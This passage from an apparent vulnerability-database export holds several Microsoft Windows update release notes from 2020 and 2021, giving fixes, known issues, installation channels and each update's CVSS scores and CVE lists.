"None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**UPDATED 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article. To view other notes and messages, see the Windows 10, version 1607 update history home page.\n\n## Highlights\n\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n * Updates to improve security when using Microsoft Office products.\n * Updates to improve security when Windows performs basic operations.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Allows administrators to use a Group Policy to enable Save Target As for users in Microsoft Edge IE Mode.\n * Allows you to restrict the JScript Scripting Engine to a process.\n * Address an issue that causes an application to stop working if the app uses a hook.\n * Addresses an issue that causes the Microsoft Management Console (MMC) Group Policy application to stop working when you are editing the Group Policy Security settings. The error message is, \u201cMMC cannot initialize the snap-in.\u201d\n * Addresses an issue with devices on which Credential Guard is enabled; if these devices use a Machine Bound certificate, authentication requests might fail. This occurs because Windows 2016 and Windows 2019 domain controllers add duplicate KeyID values to the **msDS-KeyCredentialLink** attribute of these devices.\n * Addresses an issue that might cause stop error 7E in **nfssvr.sys** on servers running the Network File System (NFS) service.\n * Addresses an issue with Remote Desktop Session Host (RDSH) connection brokers that prevents users from connecting to a Remote Desktop in collections. This issue occurs because of an access violation in **tssdis.exe**.\n * Addresses an issue that causes the Windows Management Instrumentation (WMI) Provider Host (**WmiPrvSE.exe**) to leak registry key handles when querying **Win32_RDCentralPublishedDeploymentSettings**.\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n * Addresses an issue that might cause Windows 10 devices that enable Credential Guard to fail authentication requests when they use the machine certificate.\n * Addresses an issue with incorrect Canonical Display Driver (CDD) buffer flushing, which degrades performance in Remote Desktop Protocol (RDP) Windows 2000 Display Driver Model (XDDM) scenarios. This issue affects applications that use graphics processing units (GPU) to operate, such as Microsoft Teams, Microsoft Office, and web browsers.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue in the future, make sure your applications or services run as a specific user or service account.\n * Addresses an issue with remote procedure call (RPC) runtime that might cause memory to leak. As a result, performance degrades, which causes high CPU usage, slowness, or resource depletion.\n * Security updates to the Microsoft Scripting Engine, the Microsoft Graphics Component, the Windows Wallet Service, Windows Fundamentals, the Windows Kernel, and Windows Virtualization.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4467684, the cluster service may fail to start with the error \u201c2245 (NERR_PasswordTooShort)\u201d if the group policy \u201cMinimum Password Length\u201d is configured with greater than 14 characters.| Set the domain default \"Minimum Password Length\" policy to less than or equal to 14 characters.Microsoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the [Windows release health](<https://docs.microsoft.com/windows/release-information/status-windows-10-1607-and-windows-server-2016#1522msgdesc>) page. **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594441. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4576750) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586830>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4586830](<https://download.microsoft.com/download/4/5/a/45ab9419-b92c-4a5f-812a-a9bcbff58398/4586830.csv>).\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586830 (OS Build 14393.4046) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17052"], "modified": "2020-11-10T08:00:00", "id": "KB4586830", "href": "https://support.microsoft.com/en-us/help/4586830", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:07:13", "description": "None\n**2/24/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>).**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n * Updates security for the Windows user interface.\n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n## \n\n__\n\nWindows 10 servicing stack update - 19041.860 and 19042.860 \n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1140) released March 9, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows Fundamentals, Windows Management, Windows Apps, Windows User Account Control (UAC), Windows Virtualization, the Windows Kernel, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001567. \nWhen opening a document in Microsoft Word, Microsoft Excel, or any Microsoft Office applications, you might receive the error, \"Microsoft Excel cannot open or save any more documents because there is not enough available memory or disk space\". This issue only affects devices that have installed Microsoft Office apps from the Microsoft Store and are attempting to open a document that has triggered the use of the [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) feature.| This issue is resolved using [Known Issue Rollback (KIR)](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/known-issue-rollback-helping-you-keep-windows-devices-protected/ba-p/2176831>). Please note that it might take up to 24 hours for the resolution to propagate automatically to non-managed devices. Restarting your device might help the resolution apply to your device faster. For enterprise-managed devices that have installed an affected update and encountered this issue, it can be resolved by installing and configuring a special [Group Policy](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdownload.microsoft.com%2Fdownload%2Fb%2F8%2F9%2Fb89221d0-d5db-40a7-bf25-cecbee25f713%2FWindows%252010%2520\$2004%2520%26%252020H2\$%2520Known%2520Issue%2520Rollback%2520031321%252001.msi&data=04%7C01%7Cv-shros%40microsoft.com%7Cb49064532f8d45d7665e08d8e806c6a4%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637514463287760865%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=K8MGbGmWKrnTVBgY2Oyu6J0PGayW%2FVYVj1uYJne%2FyGI%3D&reserved=0>).**Note **Devices need to be restarted after configuring the special Group Policy. To find out more about using Group Policies, see [Group Policy Overview](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831791\$v=ws.11\$>). \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001649. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). If you encounter the error, 0x800f0823 \u2013 CBS_E_NEW_SERVICING_STACK_REQUIRED, close the error message and install the last standalone SSU (KB4598481) **before** installing this LCU. You will not need to install this SSU (KB4598481) again for future updates. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000802>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000802](<https://download.microsoft.com/download/6/1/d/61df0952-0004-446c-9f34-a47dff0803b0/5000802.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.860 and 19042.860](<https://download.microsoft.com/download/9/9/2/992dfc5e-28a2-49ca-8397-f0917198c7b8/SSU_Version_19041.860.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000802 (OS Builds 19041.867 and 19042.867)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-27070"], "modified": "2021-03-09T08:00:00", "id": "KB5000802", "href": "https://support.microsoft.com/en-us/help/5000802", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T16:08:02", "description": "None\n**2/16/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**12/8/20 \nREMINDER **Windows 10, version 1903 reached end of servicing on December 8, 2020. To continue receiving security and quality updates, Microsoft recommends that you update to the latest version of Windows 10. If you want to update to Windows 10, version 1909, you must use the Enablement Package KB4517245 (EKB). Using the EKB makes updating faster and easier and requires a single restart. For more information, see [Windows 10, version 1909 delivery options](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-version-1909-delivery-options/ba-p/1002660>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18363.1102) released March 9, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows Fundamentals, Windows Management, Windows Apps, Windows User Account Control (UAC), Windows Core Networking, Windows Hybrid Cloud Networking, Windows Virtualization, the Windows Kernel, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001566. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001648. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5000908) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000808>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000808](<https://download.microsoft.com/download/9/9/8/998a9361-44aa-4392-9a1e-fd820f27759c/5000808.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000808 (OS Build 18363.1440)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-24090"], "modified": "2021-03-09T08:00:00", "id": "KB5000808", "href": "https://support.microsoft.com/en-us/help/5000808", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:19", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004956](<https://support.microsoft.com/help/5004956>) (released July 6, 2021) and addresses the following issues: \n\n * Addresses an issue in which 16-bit applications fail with an error message that states a general fault in VBRUN300.DLL.\n * Addresses an issue in which some EMFs built by using third-party applications that use **ExtCreatePen** and **ExtCreateFontIndirect** render incorrectly.\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows Operating System Security, Windows Graphics, Microsoft Scripting Engine, Windows HTML Platforms, and Windows MSHTML Platform.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004294>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004294](<https://download.microsoft.com/download/d/d/8/dd8d3ce0-52b3-4c5c-a23c-4db4f85de1a8/5004294.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004294 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-34459"], "modified": "2021-07-13T07:00:00", "id": "KB5004294", "href": "https://support.microsoft.com/en-us/help/5004294", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:18", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004953](<https://support.microsoft.com/help/5004953>) (released July 6, 2021) and addresses the following issues:\n\n * Addresses an issue in which 16-bit applications fail with an error message that indicates a general fault in VBRUN300.DLL.\n * Addresses an issue in which some EMFs built by using third-party applications that use **ExtCreatePen** and **ExtCreateFontIndirect** render incorrectly.\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows Graphics, Microsoft Scripting Engine, Windows HTML Platforms, and Windows MSHTML Platform.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL 